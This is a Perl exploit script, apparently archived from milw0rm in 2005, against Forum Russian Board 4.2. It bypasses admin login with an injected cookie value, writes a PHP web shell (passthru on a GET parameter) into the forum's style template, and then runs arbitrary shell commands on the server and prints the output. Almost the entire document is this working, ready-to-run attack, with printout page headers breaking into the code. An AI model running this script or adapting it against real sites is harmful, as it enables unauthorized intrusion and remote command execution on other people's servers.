
Forum Russian Board 4.2 Full Command Execution Exploit

  1    #!/usr/bin/perl
  2
  3    #   Forum Russian Board 4.2 Full (FRB) (http://www.carline.ru , http://frb.ru)
  4    #   command execution exploit by RST/GHC (http://rst.void.ru , http://ghc.ru)
  5    #   bugs found by foster & 1dt.w0lf , xpl coded by 1dt.w0lf
  6    #   RST/GHC - http://rst.void.ru , http://ghc.ru
  7
  8    use IO::Socket;
  9    use Getopt::Std;
  10
  11   getopts("h:p:u:i:c:");
  12
  13   $host   =   $opt_h;
  14   $path   =   $opt_p;
  15   $user   =   $opt_u;
  16   $id     =   $opt_i;
  17   $cmd    =   $opt_c || ’create’;
  18
  19   $cmdspl = "%26%26"; # ;      − for unix
  20                       # %26%26 − for windows
  21
  22   if(!$host || !$path) { usage(); }
  23   if(($cmd eq ’create’ || $cmd eq ’delete’) && (!$user || !$id)) { usage(); }
  24
  25   $host =~ s/(http:\/\/)//g;
  26   $cook = $user."’ /*";
  27
  28   if($cmd eq ’create’ || $cmd eq ’delete’){
  29   head();
  30   print ">>> CREATE SHELL\n" if ($cmd eq ’create’);
  31   print ">>> DELETE SHELL\n" if ($cmd eq ’delete’);
  32   $sock = IO::Socket::INET−>new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[−] CONNECT FAILED\n";
  33   print $sock "GET ${path}admin/style_edit.php HTTP/1.1\n";
  34   print $sock "Host: $host\n";
  35   print $sock "Accept: */*\n";
  36   print $sock "Cookie: board_user_cook=$cook;board_user_id=$id\n";
  37   print $sock "Connection: close\n\n";
  38   print "GETTING CURRENT STYLE ... [";
  39   while ($res = <$sock>)
  40   {
  41     if($res =~ /(.*)<\/textarea>/) { $data .= $1; $p = 0; }
  42     $data .= $res if $p;
  43     if($res =~ s/(.*)(<textarea)([^<>]*)([>])(.*)/$5/) { $data .= $res; $p = 1; }
  44   }
  45
  46   if(length($data)>0) { print " DONE ]\n"; }
  47   else { print " FAILED ]\n"; exit(); }
  48
  49   if($data =~ /rst_ghc/)
  50    {
  51    if($cmd eq ’create’) { print "SHELL ALREADY EXIST!"; exit(); }
  52    if($cmd eq ’delete’)
RusH                                                                                                                   06/21/2005
                         Forum Russian Board 4.2 Full Command Execution Exploit                                         Page 2/3
  53      {
  54      print "SHELL EXIST.\nDELETING SHELL.\n";
  55      $data =~ s/\s*<\? if\(\$_GET\[rst_ghc\]\)\{ passthru\(\$_GET\[rst_ghc\]\); \} \?>//g;
  56      }
  57    }
  58   else
  59    {
  60    if($cmd eq ’create’)
  61      {
  62      $data .= "\n";
  63      $data .= ’<? if($_GET[rst_ghc]){ passthru($_GET[rst_ghc]); } ?>’;
  64     }
  65    if($cmd eq ’delete’) { print "SHELL NOT EXIST. CAN’T DELETE."; exit(); }
  66    }
  67
  68   $data =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
  69   $post = "message=${data}&form_h=yes&style_edit_ok=%C8%E7%EC%E5%ED%E8%F2%FC";
  70   print "CREATE NEW STYLE ...[";
  71   $sock = IO::Socket::INET−>new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[−] CONNECT FAILED\r\n";
  72   print $sock "POST ${path}admin/style_edit.php HTTP/1.1\n";
  73   print $sock "Host: $host\n";
  74   print $sock "Cookie: board_user_cook=$cook;board_user_id=$id\n";
  75   print $sock "Content−Type: application/x−www−form−urlencoded\n";
  76   print $sock "Content−length: ".length($post)."\n\n";
  77   print $sock "$post";
  78   print $sock "\n\n";
  79   print " DONE ]\n";
  80   if($cmd eq ’create’) { print "SHELL CREATED SUCCESSFULLY! NOW YOU CAN TRY EXECUTE COMMAND."; }
  81   if($cmd eq ’delete’) { print "SHELL DELETED!"; }
  82   }
  83   else
  84   {
  85   head();
  86   print ">>> COMMAND EXECUTE\n";
  87   $sock = IO::Socket::INET−>new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[−] CONNECT FAILED\n";
  88   print $sock "GET ${path}index.php?rst_ghc=echo%20_START_%20$cmdspl%20$cmd%20$cmdspl%20echo%20_END_%20; HTTP/1.1\n";
  89   print $sock "Host: $host\n";
  90   print $sock "Accept: */*\n";
  91   print $sock "Connection: close\n\n";
  92
  93   while ($res = <$sock>)
  94   {
  95     if($res =~ /^_END_/) { $p = 0; }
  96     $data .= $res if $p;
  97     if($res =~ /^_START_/) { $p = 1; }
  98   }
  99   if(length($data)>0) {
 100                          print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n";
 101                          print $data;
 102                          print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n";
 103                          exit(0);
 104                        }
RusH                                                                                                                    06/21/2005
                            Forum Russian Board 4.2 Full Command Execution Exploit      Page 3/3
 105   else { print "[−] FAILED\nMaybe you forget create shell first?\n"; exit(0); }
 106
 107   }
 108
 109   sub usage()
 110   {
 111     head();
 112     print " USAGE : r57frb.pl [options]\n\n";
 113     print " Options: \n";
 114     print "      −h − host e.g. ’127.0.0.1’ , ’www.frb.ru’\n";
 115     print "      −p − path to forum e.g. ’/frb/’ , ’/forum/’\n";
 116     print "      −u − admin username e.g. ’admin’\n";
 117     print "      −i − admin id e.g. ’1’\n";
 118     print "      −c [create|delete|cmd]\n";
 119     print "         create − for create shell\n";
 120     print "         delete − for delete shell\n";
 121     print "         cmd − any command for execute\n";
 122     print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n";
 123   exit(0);
 124   }
 125
 126   sub head()
 127   {
 128     print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n";
 129     print "Forum Russian Board 4.0 Full command execution exploit by RST/GHC\n";
 130     print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n";
 131   }
 132
  133   # milw0rm.com [2005-06-21]



